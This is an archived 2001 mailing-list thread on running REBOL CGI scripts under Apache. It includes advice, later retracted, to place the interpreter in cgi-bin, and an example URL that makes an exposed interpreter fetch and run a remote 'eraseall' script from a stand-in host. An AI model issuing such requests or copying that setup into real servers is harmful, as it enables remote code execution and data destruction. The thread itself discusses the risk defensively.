Mailing List Archive: 49091 messages
  • Home
  • Script library
  • AltME Archive
  • Mailing list
  • Articles Index
  • Site search
 

APACHE + REBOL as CGI?

 [1/27] from: carlos:lorenz at: 30-Jul-2001 12:17


Hi friends, Im trying to run some CGI in REBOL on the server but have no success. According to the support team (that loves PERL) their machines (running APACHE) are not configured to support REBOL as CGI. My question is: is really necessary to configure APACHE to recognizes REBOL scripts or can I just upload REBOL.EXE to a subdirectory under my space and from there use it to run my scripts? Carlos

 [2/27] from: matt:blis at: 14-Sep-2001 16:31


Carlos Lorenz <[carlos--lorenz--net]> wrote on 30/07/01 16:17:20:
>Hi friends, >Im trying to run some CGI in REBOL on the server but have no success.
<<quoted lines omitted: 3>>
>REBOL scripts or can I just upload REBOL.EXE to a subdirectory under >my space and from there use it to run my scripts?
Hi Carlos. I did this: 1. Put rebol executable in location like /usr/bin/rebol/ 2. Initialise rebol network via telnet or editing the user.r file 3. create scripts with .cgi ending 4. Set shebang to #!/usr/bin/rebol/rebol --cgi Worked like a charm, without needing to update any apache conf files. I think apache has built in support for .cgi files. Hope this is of some use. Matt.

 [3/27] from: ryan:christiansen:intellisol at: 14-Sep-2001 10:29


I run REBOL on Apache all of the time without configuring Apache. Put rebol executable in the /bin or /cgi-bin and chmod 755 all scripts should shebang to the rebol executable (e.g. #!rebol -cs) make sure your scripts are set executable (e.g. chmod 755) Also, use .cgi extensions on your scripts. This is key, since Apache is probably set up to execute .cgi files, but NOT .r files. -Ryan "Carlos Lorenz" To: <[rebol-list--rebol--com]> <[carlos--lorenz] cc: .net> Subject: [REBOL] APACHE + REBOL as CGI? Sent by: [rebol-bounce--r] ebol.com 07/30/2001 10:47 AM Please respond to rebol-list Hi friends, Im trying to run some CGI in REBOL on the server but have no success. According to the support team (that loves PERL) their machines (running APACHE) are not configured to support REBOL as CGI. My question is: is really necessary to configure APACHE to recognizes REBOL scripts or can I just upload REBOL.EXE to a subdirectory under my space and from there use it to run my scripts? Carlos

 [4/27] from: tim:johnsons-web at: 14-Sep-2001 9:00


On Fri, Sep 14, 2001 at 10:29:32AM -0500, [ryan--christiansen--intellisol--com] wrote:
> I run REBOL on Apache all of the time without configuring Apache. > > Put rebol executable in the /bin or /cgi-bin and chmod 755 > > all scripts should shebang to the rebol executable (e.g. #!rebol -cs) > > make sure your scripts are set executable (e.g. chmod 755) > > Also, use .cgi extensions on your scripts. This is key, since Apache is > probably set up to execute .cgi files, but NOT .r files.
I run rebol apps as .r extensions on both my home linux machine and and my domain (linux also). Not a problem that I've seen, but if anyone has any comments on that process, I'd welcome an alternative opinion. I strongly recomemnd against using the default cgi-bin directory. I use "ScriptAlias". Tim
> -Ryan > "Carlos
<<quoted lines omitted: 28>>
> [rebol-request--rebol--com] with "unsubscribe" in the > subject, without the quotes.
-- Tim Johnson <[tim--johnsons-web--com]> http://www.johnsons-web.com

 [5/27] from: ryanc:iesco-dms at: 14-Sep-2001 9:09


Ryan, You should never ever put any type of interpeter in a directory accessable from the internet with executable permissions. Security holes dont get any bigger than this. --Ryan Cole [ryan--christiansen--intellisol--com] wrote:
> I run REBOL on Apache all of the time without configuring Apache. > Put rebol executable in the /bin or /cgi-bin and chmod 755
<<quoted lines omitted: 34>>
> [rebol-request--rebol--com] with "unsubscribe" in the > subject, without the quotes.
-- Ryan Cole Programmer Analyst www.iesco-dms.com 707-468-5400

 [6/27] from: matt:blis at: 14-Sep-2001 17:11


[ryan--christiansen--intellisol--com] wrote on 14/09/01 16:29:32:
>I run REBOL on Apache all of the time without configuring Apache. > >Put rebol executable in the /bin or /cgi-bin and chmod 755
I wouldn't advise this, as it's gonna open up massive holes in your server, unless you're running on your local machine and firewalled up to the teeth... Matt

 [7/27] from: ryan:christiansen:intellisol at: 14-Sep-2001 11:21


It never occurred to me before that this would be a problem. Now that I think about it though.... whoah! Good thoughts. -Ryan Matt Burns <[matt--blis--co]. To: [rebol-list--rebol--com] uk> cc: Sent by: Subject: [REBOL] Re: APACHE + REBOL as CGI? [rebol-bounce--r] ebol.com 09/14/2001 11:11 AM Please respond to rebol-list [ryan--christiansen--intellisol--com] wrote on 14/09/01 16:29:32:
>I run REBOL on Apache all of the time without configuring Apache. > >Put rebol executable in the /bin or /cgi-bin and chmod 755
I wouldn't advise this, as it's gonna open up massive holes in your server, unless you're running on your local machine and firewalled up to the teeth... Matt

 [8/27] from: tim:johnsons-web at: 14-Sep-2001 9:21


On Fri, Sep 14, 2001 at 05:11:50PM +0100, Matt Burns wrote:
> [ryan--christiansen--intellisol--com] wrote on 14/09/01 16:29:32: > >
<<quoted lines omitted: 4>>
> server, unless you're running on your local machine and firewalled up > to the teeth...
I agree. I use symlink (ln) and ScriptAlias and I AM firewalled up to the teeth....
> Matt > > -- > To unsubscribe from this list, please send an email to > [rebol-request--rebol--com] with "unsubscribe" in the > subject, without the quotes.
-- Tim Johnson <[tim--johnsons-web--com]> http://www.johnsons-web.com

 [9/27] from: matt:blis at: 14-Sep-2001 17:32


Tim Johnson <[tim--johnsons-web--com]> wrote on 14/09/01 18:21:46:
>On Fri, Sep 14, 2001 at 05:11:50PM +0100, Matt Burns wrote: >> [ryan--christiansen--intellisol--com] wrote on 14/09/01 16:29:32:
<<quoted lines omitted: 8>>
>I agree. I use symlink (ln) and ScriptAlias and I AM firewalled up >to the teeth....
:-) Matt.

 [10/27] from: john:thousand-hills at: 14-Sep-2001 17:44


Give it a shot. I run Rebol that way on NT with Sambar. With NT/IIS, I have to install the rebol. I will be attempting to run scripts on Redhat 7.1 next week. //john At 12:17 PM 7/30/2001 -0300, you wrote:

 [11/27] from: ryanc:iesco-dms at: 14-Sep-2001 17:16


I dont mean to preach, but just make very sure that it is not visible from the web. Some like this with the proper url encoding could be deadly: http://www.nosecurity.com/cgi-bin/rebol/rebol -cs --do "do http://hacksters.com/eraseall.r" --Ryan john wrote:
> Give it a shot. I run Rebol that way on NT with Sambar. > With NT/IIS, I have to install the rebol.
<<quoted lines omitted: 11>>
> [rebol-request--rebol--com] with "unsubscribe" in the > subject, without the quotes.
-- Ryan Cole Programmer Analyst www.iesco-dms.com 707-468-5400

 [12/27] from: john:thousand-hills at: 14-Sep-2001 19:40


I don't get it Ryan? Why would not having to "install" Rebol make a security hole? //john At 05:16 PM 9/14/2001 -0700, you wrote:

 [13/27] from: matt:blis at: 15-Sep-2001 11:14


> From: [rebol-bounce--rebol--com] [mailto:[rebol-bounce--rebol--com]] > On Behalf Of john > > I don't get it Ryan? Why would not having to "install" Rebol make a > security hole?
As Ryan pointed out with his very astute example, placing the Rebol binary in the cgi-bin does two things: 1) it allows your Rebol executable to be used in any url on your server 2) it allows *anyone* to do 1) Due the the nature of Rebol being able to 'do remote scripts, someone could quite easily write a script to send files/passwords/do system commands on YOUR server. This is Not A Good Thing(tm) Matt.

 [14/27] from: gchiu:compkarori at: 15-Sep-2001 23:51


> As Ryan pointed out with his very astute example, placing > the Rebol > binary in the cgi-bin does two things: > > 1) it allows your Rebol executable to be used in any url > on your server > 2) it allows *anyone* to do 1)
I would like to see a working example of this exploit. It has been mentioned before, but has *anyone* actually got it to do this?? -- Graham Chiu

 [15/27] from: matt:blis at: 15-Sep-2001 12:38


> -----Original Message----- > From: [rebol-bounce--rebol--com] [mailto:[rebol-bounce--rebol--com]]
<<quoted lines omitted: 13>>
> has been mentioned before, but has *anyone* actually got it > to do this??
I doubt you will ever see this on any live server[1]! This is a very, very well known security hazard, and is explained in more detail here http://www.cert.org/advisories/CA-1996-11.html HTH Matt. [1] that's been set up by someone that knows what they're doing.

 [16/27] from: john:thousand-hills at: 15-Sep-2001 9:50


Let me ask again, what does this have to do with NOT INSTALLING Rebol? I merely copied the files into a directory REBOL similar to the way I have done PERL for years. The only operating system that has demands for the setup of REBOL, or PERL for that matter is NT4/IIS4 and 2000-Server/IIS5.. And I use all these OS combination professionally and use PERL/REBOL now on all of them. I just started using Rebol on Redhat 7.1 this week. Otherwise NT/2000 with Sambar and Redhat is simply copy the files and use them. The common thread, as I see it -is that IIS requires the setup to work with PERL and REBOL.. Now if that makes me stupid or insecure -so be it, maybe your are just brighter than the rest of us. /john At 12:38 PM 9/15/2001 +0100, you wrote:

 [17/27] from: john:thousand-hills at: 15-Sep-2001 9:53


Matt: First -you are assuming that not installing Rebol equates to placing it in the CGI-BIN. You made that assumption, I did not. I copied PERL into its own directory for years, why would I place REBOL in the bin? //john At 11:14 AM 9/15/2001 +0100, you wrote:

 [18/27] from: tim:johnsons-web at: 15-Sep-2001 17:58


Hi John: I've noticed your questions and have time to just touch briefly on it with what I know. I personally don't know why one would have to be concerned about the location of the binary. Doesn't sound to me like your doing anything incorrect as far as Linux goes..... I do not think it's a good idea to have the rebol binary in cgi-bin, and it's really a good idea to have your own internal mapping so that your not really using the standard cgi-bin. I'm referring to using the ScriptAlias, which is in either access.conf or httpd.conf on RH 7.0 (I think - just use RH 6.0 myself). I'm sorry that I can't offer more than that, perhaps there will be more on this after the weekend. HINT: Sometimes it helps to repost under a different subject if you don't get the full edification that you are looking for. TIA Tim On Sat, Sep 15, 2001 at 09:50:17AM -0500, john wrote:
> Let me ask again, what does this have to do with NOT INSTALLING Rebol? > I merely copied the files into a directory REBOL similar to the way I have
<<quoted lines omitted: 16>>
> [rebol-request--rebol--com] with "unsubscribe" in the > subject, without the quotes.
-- Tim Johnson <[tim--johnsons-web--com]> http://www.johnsons-web.com

 [19/27] from: john:thousand-hills at: 15-Sep-2001 21:25


Thanks Tim. I have Rebol running. In Linux each domain has its own CGI-BIN for the scripts but the binaries and libraries reside in a directory accessed via an alias. As with NT/SAMBAR I simply created the REBOL directories and copied files, added " .r " to the cgi-bin as an accepted suffix attempting to keep the directories identical to my other servers for platform script/compatibility sake. I say again -the only combination that I have experienced any trouble running Rebol is NT/IIS combinations. The book covers little of what is necessary to run rebol there and we fell upon it kind of by accident, but have just recently set up 3 very active servers to run REBOL 0on top of IIS-4 (one gets a Million hits a month). Any way, NT/IIS is the only combination I see requiring formal installation. And the setup required is identical to that of PERL. That should help. We will document the steps necessary and pass them on the REBOL and Book authors. John At 05:58 PM 9/15/2001 -0800, you wrote:

 [20/27] from: john:thousand-hills at: 15-Sep-2001 21:47


Tim: I whole hearted suggest that you go to 7.1 Redhat. The difference is overwhelming. My installation takes up about 40Meg and the setup runs a real nice selection of server components. Be liberal because in about 10 days (you can change that) the system will set any unused services to a hot-standby status freeing up the assets until they are needed. It runs Rock Solid, now I am talking 7.1 not 7.0 John At 05:58 PM 9/15/2001 -0800, you wrote:

 [21/27] from: tim:johnsons-web at: 15-Sep-2001 20:10


On Sat, Sep 15, 2001 at 09:47:13PM -0500, john wrote:
> Tim:
I will be building a new machine in a month or so. I do expect to go to something with the new Kernel..... I imagine I will chose either RH 7.1 or SUSE...
> I whole hearted suggest that you go to 7.1 Redhat. The difference is > overwhelming.
<<quoted lines omitted: 14>>
> [rebol-request--rebol--com] with "unsubscribe" in the > subject, without the quotes.
-- Tim Johnson <[tim--johnsons-web--com]> http://www.johnsons-web.com

 [22/27] from: tim:johnsons-web at: 15-Sep-2001 20:13


On Sat, Sep 15, 2001 at 09:25:24PM -0500, john wrote:
> Thanks Tim. > I have Rebol running. In Linux each domain has its own CGI-BIN for the
<<quoted lines omitted: 13>>
> We will document the steps necessary and pass them on the REBOL and Book > authors.
Great! Pass them on to me too. I've got nothing on the internet with that combination, but would like to be informed in case I have anything requests to go on an NT server...
> John > At 05:58 PM 9/15/2001 -0800, you wrote:
<<quoted lines omitted: 20>>
> [rebol-request--rebol--com] with "unsubscribe" in the > subject, without the quotes.
-- Tim Johnson <[tim--johnsons-web--com]> http://www.johnsons-web.com

 [23/27] from: john:thousand-hills at: 15-Sep-2001 22:31


Ok, I will document it all Monday and pass it by the LAN Administrator to make sure I miss nothing. He and I did all three (NT-4/IIS-4) servers together because the book was a little weak. All three were equally difficult and identical in the resolution. I was surp[rised because my Linux and Sambar servers were so auto-loaded by copy/paste from the CD -I was not expecting a formal install procedure. Thank God the CD had the files in a directory called " /rebol/ "... /john At 08:13 PM 9/15/2001 -0800, you wrote:

 [24/27] from: john:thousand-hills at: 15-Sep-2001 23:39


Tim: You never know when you will need NT. The client sometimes demands the standard because they are afraid to be dependant of finding another contractor with SAMBAR or LINUX knowledge. This is the same problem I have with Rebol. Until I showed them things were unable to accomplish before. When they realized that Rebol would free them from the need for NT to run ASP, they jumped aboard. The project that convinced them was the bus routes for the blind, not only will it talk to them, it is dynamic, once any change hits the data base -the next request displays it. It has saved me a well documented 8 man weeks per year, and I draw a very high salary. They were impressed. Even more than all that, the blind can SEE (or hear) the schedules -that was a very high goal for me. And some of you guys helped me out. John At 08:13 PM 9/15/2001 -0800, you wrote:

 [25/27] from: matt:blis at: 16-Sep-2001 14:28


John wrote:
> Let me ask again, what does this have to do with NOT INSTALLING Rebol?
Sorry, I quoted you as you were the last to reply, not in direct response. AFAIK this has nothing to so with whether you've installed Rebol or not. As long as the executable is not directly available, you shouldn't have too many problems in that area. Sorry for the confusion! I'll mind the quotes next time! Matt.

 [26/27] from: john:thousand-hills at: 16-Sep-2001 23:28


Actually Matt, we go to great lengths to alias our access to the binaries. I am a retired US Naval Officer -communications and Inteligence. My oldest son is in Air Force Intel. Computer Forensics and a Redhat Certified Linux Enginere. I have him run my systems for access holes, then patch it up according to hes recommendations. Having done that, i don't worry because I can't stop anybody smarter than all that. //john At 02:28 PM 9/16/2001 +0100, you wrote:

 [27/27] from: tim:johnsons-web at: 17-Sep-2001 8:40


On Sun, Sep 16, 2001 at 11:28:02PM -0500, john wrote:
> Actually Matt, we go to great lengths to alias our access to the binaries. > > I am a retired US Naval Officer -communications and Inteligence. My oldest > son is in Air Force Intel. Computer Forensics and a Redhat Certified Linux > Enginere.
This is sort of off-topic here, but I want to pose this question (which IS apropo to these times) IMHO: If so much interest is shown in hacking microsoft, sending viruses in email, and general mischief (and some of it seems so well done), why not "enlist" these hackers in disrupting, intercepting, communications and money flow between terrorists. On a slightly related note, I have an article written 1-Sep-2001 that might be of slight interest. Disclaimer: My persona in this "webzine" is to be somewhat provocatinve, somewhat tongue-in-check and rambling is permissable BUT, having said that - I both plug rebol and talk about some serious stuff that most of us haven't shown a lot of interest in, but perhaps that has changed now. http://www.frozen-north-linuxonline.com/ see "Tim's Bytes" tj
> I have him run my systems for access holes, then patch it up according to > hes recommendations.
<<quoted lines omitted: 25>>
> [rebol-request--rebol--com] with "unsubscribe" in the > subject, without the quotes.
-- Tim Johnson <[tim--johnsons-web--com]> http://www.johnsons-web.com

Notes
  • Quoted lines have been omitted from some messages.
    View the message alone to see the lines that have been omitted